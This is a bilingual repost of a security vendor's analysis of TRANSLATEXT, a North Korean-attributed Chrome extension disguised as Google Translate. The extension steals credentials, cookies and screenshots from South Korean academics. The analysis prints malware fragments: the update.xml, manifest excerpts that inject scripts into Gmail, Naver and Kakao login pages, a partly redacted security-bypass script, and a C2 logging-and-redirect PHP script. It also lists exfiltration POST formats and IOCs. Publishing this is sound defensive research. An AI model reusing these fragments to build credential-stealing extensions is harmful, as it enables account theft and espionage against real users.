Kimsuky deploys TRANSLATEXT to target South Korean academia

APT 2周前 admin
100 0 0

Introduction 介绍

In March 2024, Zscaler ThreatLabz observed new activity from Kimsuky (aka APT43, Emerald Sleet, and Velvet Chollima), an advanced persistent threat actor backed by the North Korean government. This group, first observed in 2013, is notorious for cyber espionage, and financially motivated cyber attacks, primarily targeting South Korean entities, including think tanks, government institutions, and the academic sector. They employ various tactics, techniques, and procedures (TTPs) in their targeted campaigns and one of their distribution methods is malicious Google Chrome extensions. In July 2022, it was reported that Kimsuky used malicious Chrome extensions to target users in the U.S., Europe, and South Korea. While actively monitoring this group, we discovered an instance where Kimsuky used a new Google Chrome extension, which we named “TRANSLATEXT”, for cyber espionage. TRANSLATEXT is specifically leveraged to steal email addresses, usernames, passwords, cookies, and captures browser screenshots.
2024 年 3 月,Zscaler ThreatLabz 观察到 Kimsuky(又名 APT43、Emerald Sleet 和 Velvet Chollima)的新活动,Kimsuky 是朝鲜政府支持的高级持续威胁行为者。该组织于 2013 年首次被发现,因网络间谍活动和出于经济动机的网络攻击而臭名昭著,主要针对韩国实体,包括智库、政府机构和学术界。他们在有针对性的活动中采用各种策略、技术和程序 (TTP),其中一种分发方法是恶意 Google Chrome 扩展程序。2022 年 7 月,据报道,Kimsuky 使用恶意 Chrome 扩展程序来针对美国、欧洲和韩国的用户。在积极监控该小组时,我们发现了一个实例,其中 Kimsuky 使用新的 Google Chrome 扩展程序(我们将其命名为“ TRANSLATEXT ”)进行网络间谍活动。 TRANSLATEXT 专门用于窃取电子邮件地址、用户名、密码、cookie 并捕获浏览器屏幕截图。

Key Takeaways 关键要点

  • Kimsuky uploaded TRANSLATEXT to their attacker-controlled GitHub repository on March 7, 2024.
    Kimsuky 于 2024 年 3 月 7 日上传 TRANSLATEXT 到其攻击者控制的 GitHub 存储库。
  • TRANSLATEXT can bypass security measures for several prominent email service providers like Gmail, and Kakao and Naver (popular in South Korea) to steal information.
    TRANSLATEXT 可以绕过 Gmail、Kakao 和 Naver(在韩国流行)等几家著名电子邮件服务提供商的安全措施来窃取信息。
  • TRANSLATEXT is specifically leveraged to steal email addresses, usernames, passwords, cookies, and captures browser screenshots.
    TRANSLATEXT 专门用于窃取电子邮件地址、用户名、密码、cookie 并捕获浏览器屏幕截图。
  • Our research suggests that the main targets of this attack were in the South Korean academic field, specifically those involved in political research related to North Korean affairs. 
    我们的研究表明,这次袭击的主要目标是韩国学术界,特别是那些参与与朝鲜事务相关的政治研究的人。

Technical Analysis 技术分析

According to a recent publication by a South Korean security vendor, Kimsuky delivered an archive file named “한국군사학논집 심사평서 (1).zip”, which translates to “Review of a Monograph on Korean Military History.” 
根据韩国安全供应商最近发表的一份出版物,Kimsuky 提供了一份名为“한국군사학논집 심사평서 (1).zip”的存档文件,翻译过来就是“韩国军事历史专著回顾”。

The archive contains two decoy files: 
存档包含两个诱饵文件:

  • HWP documents (a popular office file format in South Korea) 
    HWP 文档(韩国流行的办公文件格式)
  • A Windows executable masquerading as related documents 
    伪装成相关文档的 Windows 可执行文件

When a user launches the executable, the malware retrieves a PowerShell script from the threat actor’s server. The figure below shows the Kimsuky infection chain.
当用户启动可执行文件时,恶意软件会从威胁参与者的服务器中检索 PowerShell 脚本。下图显示了 Kimsuky 感染链。

Kimsuky deploys TRANSLATEXT to target South Korean academia

Figure 1: Example Kimsuky infection chain.
图 1:Kimsuky 感染链示例。

The PowerShell script from the remote server is responsible for uploading general information about the victim and creating a Windows shortcut that retrieves an additional PowerShell script from the same server. During our own research into this campaign, we discovered another PowerShell script with the MD5 hash: bba3b15bad6b5a80ab9fa9a49b643658 and a GitHub account used by the script linked to the same actor. From this newly discovered GitHub account, we observed victim data and a previously deleted Chrome extension utilized by the actor. The delivery method for TRANSLATEXT is not currently known.
远程服务器中的 PowerShell 脚本负责上传有关受害者的常规信息,并创建一个 Windows 快捷方式,以便从同一服务器检索其他 PowerShell 脚本。在我们对这次活动的研究中,我们发现了另一个带有 MD5 哈希的 PowerShell 脚本: bba3b15bad6b5a80ab9fa9a49b643658 以及链接到同一参与者的脚本使用的 GitHub 帐户。从这个新发现的 GitHub 帐户中,我们观察到受害者数据和演员使用的先前删除的 Chrome 扩展程序。的 TRANSLATEXT 交付方式目前尚不清楚。

However, the newly discovered PowerShell script reveals that Kimsuky checked for the presence of installed Chrome extensions using the Windows registry key shown below: 
但是,新发现的 PowerShell 脚本显示,Kimsuky 使用如下所示的 Windows 注册表项检查是否存在已安装的 Chrome 扩展程序:

HKCU\Software\Policies\Google\Chrome\ExtensionInstallForcelist

This registry key is used by Chrome to enforce the installation of specified extensions without user permission or intervention. Therefore, it appears Kimsuky registered TRANSLATEXT in this registry key using previous stage methods.
Chrome 使用此注册表项强制安装指定的扩展程序,而无需用户许可或干预。因此,Kimsuky 似乎使用前一阶段的方法在此注册表项中注册 TRANSLATEXT 。

TRANSLATEXT analysis TRANSLATEXT 分析

In the attacker-controlled GitHub account, we observed an XML file in addition to TRANSLATEXT. These files were present in the repository on March 7, 2024, and deleted the next day, implying that Kimsuky intended to minimize exposure and use the malware for a short period to target specific individuals. 
在攻击者控制的 GitHub 帐户中,我们观察到除了 . TRANSLATEXT 这些文件于 2024 年 3 月 7 日出现在存储库中,并于第二天删除,这意味着 Kimsuky 打算尽量减少暴露并在短时间内使用恶意软件来针对特定个人。

The figure below shows how Kimsuky uploaded the files on March 7th to one of their GitHub accounts and then deleted them on March 8th.
下图显示了 Kimsuky 如何在 3 月 7 日将文件上传到他们的一个 GitHub 帐户,然后在 3 月 8 日将其删除。

Kimsuky deploys TRANSLATEXT to target South Korean academia

Figure 2: Kimsuky GitHub commit log shows the addition and removal of an XML file and TRANSLATEXT after only one day.
图 2:Kimsuky GitHub 提交日志仅 TRANSLATEXT 显示一天后添加和删除 XML 文件的过程。

A timeline of the GitHub user’s activity is listed below:
下面列出了 GitHub 用户活动的时间线:

  • February 13, 2024: Join GitHub
    2024 年 2 月 13 日:加入 GitHub
  • March 7, 2024: Created first repository named “motorcycle
    2024 年 3 月 7 日:创建了第一个名为“ motorcycle ” 的存储库

    • 29 commits including uploads from the victim and subsequent removals.
      29 次提交,包括受害者的上传和随后的删除。
    • Added TRANSLATEXT files: update.xmlGoogleTranslate.crx
      添加 TRANSLATEXT 的文件: update.xml , GoogleTranslate.crx
  • Mar 8, 2024: Removed update.xml and GoogleTranslate.crx
    2024 年 3 月 8 日:已删除 update.xml 和 GoogleTranslate.crx
  • Mar 18, 2024: Created motorcycle/calc
    Mar 18, 2024: 已创建 motorcycle/calc
  • Apr 4, 2024: Created a motorcycle/laxi/ter.txt that contains “sfsadfsadfa”. 
    2024 年 4 月 4 日:创建了一个 motorcycle/laxi/ter.txt 包含 “ sfsadfsadfa ” 的 。

As the name suggests, the update.xml file contained the parameters necessary for updating TRANSLATEXT as shown below.
顾名思义,该 update.xml 文件包含更新 TRANSLATEXT 所需的参数,如下所示。

<?xml version='1.0' encoding='UTF-8'?>
<gupdate xmlns='http://www.google.com/update2/response' protocol='2.0'>
   <app appid='gibabegbpcndhaoegbalnmgkeoaopajp'>
       <updatecheck codebase='hxxps://github[.]com/cmastern/motorcycle/raw/main/GoogleTranslate.crx' version='1.5.2' />
   </app>
</gupdate>

TRANSLATEXT was uploaded to GitHub as “GoogleTranslate.crx”, and masqueraded as a Google Translate extension. However, TRANSLATEXT actually contained four malicious Javascript files for bypassing security measures, stealing email addresses, credentials, cookies, capturing browser screenshots, and exfiltrating stolen data. 
TRANSLATEXT 以“ GoogleTranslate.crx ”的身份上传到 GitHub,并伪装成谷歌翻译扩展。但是, TRANSLATEXT 实际上包含四个恶意 Javascript 文件,用于绕过安全措施、窃取电子邮件地址、凭据、cookie、捕获浏览器屏幕截图和泄露被盗数据。

The figure below depicts the role of each Javascript file in stealing and sending information to the C2 server.
下图描述了每个 Javascript 文件在窃取信息并将其发送到 C2 服务器中的作用。

Kimsuky deploys TRANSLATEXT to target South Korean academia

Figure 3: Kimsuky TRANSLATEXT architecture.
图 3:Kimsuky TRANSLATEXT 架构。

According to the manifest.json file, the author name is listed as “Piano”, and the update_url points to another GitHub address referencing an update.xml file that did not exist at the time of our analysis. The description and default title fields contain Korean, which likely indicates that this campaign was specifically targeting South Korea–we discuss this later in the blog.
根据 manifest.json 该文件,作者姓名被列为“ Piano ”,并 update_url 指向另一个 GitHub 地址,该地址引用了我们分析时不存在 update.xml 的文件。描述和默认标题字段包含韩语,这可能表明此广告系列专门针对韩国 – 我们将在博客后面讨论这一点。

A part of the manifest.json file is shown below.
manifest.json 文件的一部分如下所示。

{
   // Required
   "author": "Piano",
   "manifest_version": 3,
   "name": "Google Translate",
   "version": "1.5.2",
   
   // Recommended
   "action": {
       "default_icon": "icons/16.png",
       "default_title": "번역하려면 마우스 왼쪽 버튼을 클릭하세요."
   },
   "description": "웹을 탐색하면서 편하게 번역을 볼 수 있습니다. 이 기능은 Google 번역팀에서 제공합니다.",
   "icons":{
       "16": "icons/16.png",
       "19": "icons/19.png",
       "32": "icons/32.png",
       "38": "icons/38.png",
       "48": "icons/48.png",
       "128": "icons/128.png"
   },
   "update_url": "https://raw.githubusercontent.com/HelperDav/Web/main/update.xml",
       
   // Optional
   "background": {
       "service_worker": "background.js"
   },
   "content_security_policy": {
       "extension_page": "script-src 'self' 'wasm-unsafe-eval'; object-src 'self'"
   },
   "permissions": ["tabs", "activeTab", "cookies", "storage", "downloads", "scripting"],

The TRANSLATEXT manifest requests excessive permissions such as scripting. This broad permission allows TRANSLATEXT to inject scripts into web pages, enabling it to modify page content, add functionality, and/or interact with the page’s elements.
TRANSLATEXT 清单请求过多的权限,例如脚本。这种广泛的权限允许 TRANSLATEXT 将脚本注入网页,使其能够修改页面内容、添加功能和/或与页面元素交互。

Depending on the URL the victim visits, a corresponding script is launched. 
根据受害者访问的 URL,将启动相应的脚本。

  • When the victim visits the Naver login page (nid.naver.com/*) or the Kakao login page (accounts.kakao.com/*), the auth.js file is injected into the web page. 
    当受害者访问 Naver 登录页面 (nid.naver.com/*) 或 Kakao 登录页面 (accounts.kakao.com/*) 时, auth.js 文件会注入网页。
  • Similarly, when visiting the Gmail login page (mail.google.com/), the gsuit.js file is injected into the web page. 
    同样,在访问 Gmail 登录页面 (mail.google.com/) 时, gsuit.js 文件会注入到网页中。

The content.js script is injected into all web pages using the manifest file as shown below.
该 content.js 脚本使用清单文件注入到所有网页中,如下所示。

"content_scripts": [
       {
           "js": [ "content.js"],
           "matches": [
               "http://*/*", "https://*/*"
           ],
           "run_at": "document_idle",
           "all_frames": false
       },
       {
           "js": [ "auth.js"],
           "matches": [
               "https://nid.naver.com/*",
               "https://accounts.kakao.com/*"
           ],
           "run_at": "document_end",
           "all_frames": false
       },
       {
           "js": [ "gsuit.js"],
           "matches": [
               "https://mail.google.com/*"
           ],
           "run_at": "document_end",
           "all_frames": false
       }
   ]

Security bypass 安全绕过

The script injected into the web page is responsible for bypassing security measures on each specific login page. 
注入网页的脚本负责绕过每个特定登录页面上的安全措施。

Note: For security reasons, we’ve replaced sensitive variable names in the script to prevent unauthorized actors from exploiting these methods. 
注意:出于安全原因,我们替换了脚本中的敏感变量名称,以防止未经授权的参与者利用这些方法。

The gsuit.js script searches for all <div> elements with the specific class name in the web page and then removes them from the Document Object Model (DOM) as shown below.
该 gsuit.js 脚本在网页中搜索具有特定类名的所有 <div> 元素,然后将它们从文档对象模型 (DOM) 中删除,如下所示。

"use strict";
function NeverNotify()
{
   var x = document.querySelectorAll("[redacted]");
   for(var i=0; i<x.length; i++)
   {
         if(x[i])
       {
           x[i].remove();
       }
   }
}
setInterval(() => {NeverNotify();}, 50);

The auth.js script is used for manipulating security measures for Naver and Kakao. To bypass Kakao, the script checks for elements with specific IDs. If these elements exist, the script clicks them. This action typically means opting to remember the browser to avoid repeated security prompts. The script selects all elements and ensures their class names are set correctly, possibly to ensure all checkboxes of this type are checked.
该 auth.js 脚本用于操作 Naver 和 Kakao 的安全措施。为了绕过 Kakao,该脚本会检查具有特定 ID 的元素。如果这些元素存在,脚本将单击它们。此操作通常意味着选择记住浏览器以避免重复的安全提示。该脚本选择所有元素并确保正确设置其类名,可能是为了确保选中此类型的所有复选框。
 

The Naver section of the script, similar to the Kakao section, identifies elements with specific IDs and performs clicks on them. These clicks serve various purposes, such as skipping or acknowledging waiting times and dialogs within Naver’s security measure process. For instance, it locates an element with the ID auto and sets its value to init, potentially as part of a setup or initialization process for the authentication page. 
脚本的 Naver 部分与 Kakao 部分类似,用于识别具有特定 ID 的元素并执行单击。这些点击有多种用途,例如跳过或确认 Naver 安全措施流程中的等待时间和对话框。例如,它查找具有 ID auto 的元素,并将其值设置为 init ,可能作为身份验证页面的设置或初始化过程的一部分。

Note: We have notified the Google and Naver security teams about these security bypasses and are closely working with them to mitigate the issue.
注意:我们已将这些安全绕过措施通知了 Google 和 Naver 安全团队,并正在与他们密切合作以缓解该问题。

Email address stealer – content.js
电子邮件地址窃取者 – content.js

The main objective of this Javascript file is to collect email address and password data entered into the forms and send the information to a background page. The script performs these actions as follows:
此Javascript文件的主要目的是收集输入到表单中的电子邮件地址和密码数据,并将信息发送到后台页面。该脚本按如下方式执行这些操作:

  • Hooking into various form elements such as buttons and input fields to capture clicks and keypresses to initiate sending data.
    挂接到各种表单元素(如按钮和输入字段)以捕获点击和按键以启动发送数据。
  • Collecting all email addresses entered into any input fields (“type=email”), general text (“type=text”), or textboxes (“role=textbox”), and concatenating them into a single string. 
    收集输入到任何输入字段 (“ type=email ”)、常规文本 (“ type=text ”) 或文本框 (“ role=textbox ”) 中的所有电子邮件地址,并将它们连接成一个字符串。
  • Collecting values from all input fields of the type password, and concatenating the email address and password data collected into a string format suitable for transmission.
    从密码类型的所有输入字段中收集值,并将收集到的电子邮件地址和密码数据连接成适合传输的字符串格式。
  • Monitoring user actions, like pressing Enter, by adding event listeners to various button types and input fields. It uses a mutex variable to prevent multiple transmissions at the same time. This monitoring process is repeated every 500 milliseconds, ensuring new elements on the page or dynamically added elements are also monitored.
    通过将事件侦听器添加到各种按钮类型和输入字段来监视用户操作,例如按 Enter。它使用互斥变量来防止同时进行多个传输。此监视过程每 500 毫秒重复一次,确保页面上的新元素或动态添加的元素也受到监视。

Service worker – background.js

The Javascript employs the dead drop resolver technique to retrieve configurations and commands from the public blog service: 
Javascript 采用死掉解析器技术从公共博客服务中检索配置和命令:

hxxps://onewithshare.blogspot[.]com/2023/04/10.html

If the blog URL is active, the Javascript extracts the pattern with the following regular expression: 
如果博客 URL 处于活动状态,则 Javascript 会使用以下正则表达式提取模式:

<input name="${name}" type="hidden" value="(.*?)"> 

This parses the content from the value parameter of a hidden input field. When we originally checked the blog, there were no relevant values present in this format. However, on July 1, 2024, another researcher identified an update to the threat actor’s blog with the Capture command, indicating that the threat actor is actively managing the campaign. The figure below shows the threat actor’s blog updated with the Capture command. 
这将从隐藏输入字段的 value 参数中解析内容。当我们最初检查博客时,这种格式不存在相关值。然而,在 2024 年 7 月 1 日,另一位研究人员发现了带有该 Capture 命令的威胁行为者博客的更新,表明威胁行为者正在积极管理该活动。下图显示了使用该 Capture 命令更新的威胁参与者的博客。

Kimsuky deploys TRANSLATEXT to target South Korean academia

Figure 4: The threat actor’s blog’s updated with the Capture command on July 1, 2024.
图 4:威胁参与者的博客已于 2024 年 7 月 1 日更新了该 Capture 命令。

There are four types of commands expected by the code, and they are described in the table below:
代码需要四种类型的命令,下表对它们进行了描述:

Command 命令

Description 描述

URL

Parses and Base64 decodes the value and appends /log.php. This newly formed URL is used as a new C2 server.
Parses 和 Base64 解码该值并附加 /log.php .这个新形成 URL 的服务器被用作新的 C2 服务器。

Capture

When a new tab is created, the code sends the current time and URL of the tab, taking a screenshot of the tab with chrome.tabs.captureVisibleTab API every 5 seconds.
创建新选项卡时,代码会发送选项卡的当前时间和 URL,每 5 秒使用 chrome.tabs.captureVisibleTab API 截取选项卡的屏幕截图。

delcookie

Removes all cookies from the browser.
从浏览器中删除所有 cookie。

Run

Injects a <a> tag with the href value ms-powerpoint:// in all Chrome tabs, invoking the click event every 30 minutes.
在所有 Chrome 标签页中注入带有 href 值 <a> ms-powerpoint:// 的代码,每 30 分钟调用一次点击事件。

Table 1: Commands supported by Kimsuky’s TRANSLATEXT.
表 1:Kimsuky 支持的命令 TRANSLATEXT 。

The background script also registers several listeners with specific functionality as described below:
后台脚本还注册了多个具有特定功能的侦听器,如下所述:

  • Send background Javascript listener: This listener is triggered when a new message is created, allowing for appropriate actions to be taken in response.
    发送后台 Javascript 侦听器:此侦听器在创建新消息时触发,允许采取适当的操作作为响应。
  • Tab update listener: When a tab is updated, this listener sends the URL of the newly created tab along with a screenshot, based on the presence of the Capture flag.
    选项卡更新侦听器:更新选项卡时,此侦听器会根据 Capture 标志的存在情况发送新创建选项卡的 URL 以及屏幕截图。
  • Cookie change listener: Whenever a cookie is modified, this listener checks if the domain includes googlenaverkakao, or daum, and if the reason for the change is expiredevicted, or explicit. In such cases, the new cookie value is sent to the remote C2 server.
    Cookie 更改侦听器:每当修改 Cookie 时,此侦听器都会检查域是否包含 google 、 naver 、 kakao 或 daum ,以及更改的原因是否为 expired 、 evicted 或 explicit 。在这种情况下,新的 cookie 值将发送到远程 C2 服务器。

TRANSLATEXT uses HTTP POST requests for C2 communications, with the following hardcoded HTTP headers:
TRANSLATEXT 使用 HTTP POST 请求进行 C2 通信,并具有以下硬编码的 HTTP 标头:

Accept: application/json, application/xml, text/plain, text/html, *.*,
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Access-Control-Allow-Origin: "*"
Access-Control-Allow-Credentials: true

TRANSLATEXT uses the following HTTP POST fields for sending the stolen information.
TRANSLATEXT 使用以下 HTTP POST 字段发送被盗信息。

Data to Send 要发送的数据

POST Data Format POST 数据格式

Email/password 电子邮件/密码

event=[current time]-->

event=[url]

event=email=[email]**pwd=[passwd] 

New tab image 新标签页图像

tab=[current time]-->

tab=[url]

image=[image data]&url=[tab url]

Cookie (send all cookies)
Cookie(发送所有 Cookie)

cookie=[current time]-->

cookie=[all cookie value]

Cookie (cookie changed) Cookie(已更改 Cookie)

cookie={expired|evicted|explicit}:[current time]-->

cookie=[cookie value]

Table 2: HTTP POST data format for Kimsuky’s TRANSLATEXT.
表 2:Kimsuky 的 HTTP POST 数据格式 TRANSLATEXT 。

Victims 受害者

The data stolen by the threat actor included browser login data and cookies. One of the victims is in the education sector in South Korea. Based on this gathered information, we surmise that academic researchers specializing in the Korean peninsula, particularly those engaged in geopolitical matters involving North Korea, are among the primary targets of this campaign. 
威胁参与者窃取的数据包括浏览器登录数据和 cookie。其中一名受害者在韩国的教育部门。根据这些收集到的信息,我们推测,专门研究朝鲜半岛的学术研究人员,特别是那些从事涉及朝鲜的地缘政治事务的研究人员,是这场运动的主要目标之一。

Threat Attribution 威胁归因

Considering the C2 characteristics and victimology, we attribute this attack to the Kimsuky group with medium confidence. 
考虑到 C2 的特征和受害者学,我们将这次攻击归因于 Kimsuky 组,置信度中等。

C2 server characteristics
C2 服务器特征

From the threat actor’s server, we discovered the presence of a b374k webshell (hxxps://webman.w3school.cloudns[.]nz/config.php) used for exfiltrating stolen information. The Kimsuky group has a history of frequently utilizing the b374k webshell.
从威胁参与者的服务器中,我们发现存在 b374k webshell (hxxps://webman.w3school.cloudns[.]nz/config.php) 用于泄露被盗信息。Kimsuky 团队有经常使用 b374k webshell 的历史。

Furthermore, the main page of the threat actor’s server redirects clients to the legitimate Gmail page when they connect without any parameters. This behavior aligns with the characteristic C2 configuration of the Kimsuky group. This redirection to well-known and trusted services like Gmail, Naver, or Kakao helps to lower suspicion and avoid sending informative configurations. As an example below, we show an old PHP script from the Kimsuky group’s C2 server that captures the client’s IP address and redirects the client’s connection to Gmail using the Location header.
此外,当客户端连接时,威胁参与者服务器的主页会在没有任何参数的情况下将客户端重定向到合法的 Gmail 页面。此行为与 Kimsuky 组的特征 C2 配置一致。这种重定向到 Gmail、Naver 或 Kakao 等知名且受信任的服务有助于降低怀疑并避免发送信息配置。在下面的示例中,我们展示了 Kimsuky 组的 C2 服务器中的旧 PHP 脚本,该脚本捕获客户端的 IP 地址,并使用 Location 标头将客户端的连接重定向到 Gmail。

<?php
date_default_timezone_set('Asia/Seoul');
$Now_time = time();
$date = date("Y-m-d-h-i-s-A",$Now_time);
$ip = getenv("REMOTE_ADDR");
if(isset($_GET['ip'])){
       $szfilename = "allow.txt";
       $pfile = fopen($szfilename,"ab");
       $res= $_GET['ip'] . "\r\n" ;
       fwrite($pfile,$res);
       fclose($pfile);  
       exit;
}
$szfilename = "error.txt";
$pfile = fopen($szfilename,"ab");
$res= $date . "-" . "\r\n".$ip . "\r\n" . $_SERVER['HTTP_USER_AGENT']."\r\n";
fwrite($pfile,$res);
fclose($pfile);  
header('Location: https://mail.google.com');
?>

Employing “r-e.kr” domains
使用“r-e.kr”域

From the newly discovered PowerShell script, we found that the actor used the domain “r-e[.]kr” to host the malicious PowerShell scripts. The r-e.kr domain was registered by a Korean ISP named “viaweb”. 
从新发现的 PowerShell 脚本中,我们发现 actor 使用了域“r-e[.]kr“来托管恶意 PowerShell 脚本。该 r-e.kr 域名由一家名为“ viaweb ”的韩国ISP注册。

Domain item 域项

Details 

Domain Name 域名

r-e.kr

Registrant 注册

hyon jin park Hyon Jin Park(玄珍公园酒店)

Administrative Contact (AC)
行政联系人 (AC)

Hyonjin Park 贤镇公园

AC E-Mail  AC邮箱

Registered Date 注册日期

2014. 03. 22.

Last Updated Date 最后更新日期

2022. 11. 22.

Expiration Date 有效期

2025. 03. 22.

Publishes 出版

N

Authorized Agency 授权机构

viaweb(http://viaweb.co.kr)
通过网络(http://viaweb.co.kr)

Table 3: Kimsuky domain details.
表 3:Kimsuky 域详细信息。

Historically, the Kimsuky group has frequently abused this domain, according to other security vendors. In addition to the r-e.kr domain, they have used similar domains registered with the same provider, such as p-e.kr and o-r.kr. While the overlap of specific domains is common, these types of domains are not well-known, and we believe that only a few threat actors prefer using them.
根据其他安全供应商的说法,从历史上看,Kimsuky 集团经常滥用此域。除了域之外, r-e.kr 他们还使用了在同一提供商处注册的类似域,例如 p-e.kr 和 o-r.kr 。虽然特定域的重叠很常见,但这些类型的域并不为人所知,我们相信只有少数威胁参与者更喜欢使用它们。

Victimology 受害者学

During our research, we identified a specific victim of this attack, an academic with a keen interest in geopolitical issues pertaining to the Korean peninsula. One of the primary objectives of the Kimsuky group is to conduct surveillance on academic and government personnel in order to gather valuable intelligence. Hence, the characteristics exhibited by this campaign are consistent with the intentions of Kimsuky.
在我们的研究过程中,我们确定了这次袭击的具体受害者,一位对朝鲜半岛地缘政治问题有着浓厚兴趣的学者。Kimsuky 小组的主要目标之一是对学术和政府人员进行监视,以收集有价值的情报。因此,这场运动所表现出的特征与Kimsuky的意图是一致的。

Conclusion 结论

Our research indicates that malicious Google Chrome extensions continue to be leveraged by Kimsuky. The group appears to be targeting academia in South Korea as part of an ongoing intelligence collection campaign. To mitigate the risk from active North Korea-affiliated threat actors like Kimsuky, it is imperative to stay informed about their latest tactics. Additionally, exercising caution when installing programs from untrusted sources is essential in maintaining security and preventing potential breaches.
我们的研究表明,恶意的 Google Chrome 扩展程序继续被 Kimsuky 利用。该组织似乎将目标对准了韩国的学术界,作为正在进行的情报收集活动的一部分。为了降低像 Kimsuky 这样活跃的朝鲜附属威胁行为者的风险,必须随时了解他们的最新策略。此外,在安装来自不受信任来源的程序时要谨慎,这对于维护安全性和防止潜在的违规行为至关重要。

Zscaler Coverage Zscaler 覆盖范围

Zscaler’s multilayered cloud security platform detects indicators related to TRANSLATEXT at various levels with the following threat names:
Zscaler 的多层云安全平台可检测与以下威胁名称相关的 TRANSLATEXT 各个级别的指标:

Indicators Of Compromise (IOCs)
妥协指标 (IOC)

Indicators 指标

Description 描述

bba3b15bad6b5a80ab9fa9a49b643658

PowerShell script (tys.txt).
PowerShell 脚本 (tys.txt)。

38e27983c757374d9bae36a2e2520e8e

TRANSLATEXT (GoogleTranslate.crx).
TRANSLATEXT (GoogleTranslate.crx)。

hxxp://sdfa.liveblog365[.]com/ares/hades.txt

PowerShell script download URL.
PowerShell 脚本下载 URL。

hxxp://sdfa.liveblog365[.]com/ares/babyhades.txt

PowerShell script download URL.
PowerShell 脚本下载 URL。

hxxp://ney.r-e[.]kr/mar/tys.txt

Script download URL. 脚本下载 URL。

hxxp://ney.r-e[.]kr/mar/tys.php

Script download URL. 脚本下载 URL。

hxxps://webman.w3school.cloudns[.]nz

C2 domain to exfiltrate data.
用于泄露数据的 C2 域。

hxxps://onewithshare.blogspot[.]com/2023/04/10.html

Blog for dead drop resolver.
死滴解析器的博客。

hxxps://raw.githubusercontent[.]com/HelperDav/Web/main/update.xml

Threat actor’s GitHub. 威胁参与者的 GitHub。

hxxps://github[.]com/cmastern

Threat actor’s GitHub. 威胁参与者的 GitHub。

MITRE ATT&CK Framework MITRE ATT&CK 框架

ID

Tactic 策略

Description 描述

T1059.001

Command and Scripting Interpreter: PowerShell
命令和脚本解释器:PowerShell

Threat actor uses PowerShell script to collect general system information, and uploads it to GitHub.
威胁参与者使用 PowerShell 脚本收集常规系统信息,并将其上传到 GitHub。

T1176

Browser Extensions 浏览器扩展

Threat actor utilizes TRANSLATEXT for exfiltration and persistence.
威胁参与者 TRANSLATEXT 用于外泄和持久性。

T1555.003

Credentials from Password Stores: Credentials from Web Browsers
来自密码存储的凭据:来自 Web 浏览器的凭据

Threat actor exfiltrates credentials stored in the browser to GitHub.
威胁参与者将浏览器中存储的凭据泄露到 GitHub。

T1113

Screen Capture 屏幕截图

TRANSLATEXT captures new browser tabs.
TRANSLATEXT 捕获新的浏览器选项卡。

T1071.001

Application Layer Protocol: Web Protocols
应用层协议:Web 协议

HTTP protocol to fetch the payload and then upload exfiltrated data.
HTTP 协议来获取有效负载,然后上传泄露的数据。

T1102.001

Web Service: Dead Drop Resolver
Web 服务:Dead Drop Resolver

TRANSLATEXT receives commands from the legitimate blog post.
TRANSLATEXT 接收来自合法博客文章的命令。

T1041

Exfiltration Over C2 Channel
通过 C2 通道进行外泄

Sends collected email address and password through C2 channel.
通过 C2 通道发送收集的电子邮件地址和密码。

原文始发于SEONGSU PARK:Kimsuky deploys TRANSLATEXT to target South Korean academia

版权声明:admin 发表于 2024年7月6日 上午11:16。
转载请注明:Kimsuky deploys TRANSLATEXT to target South Korean academia | CTF导航

相关文章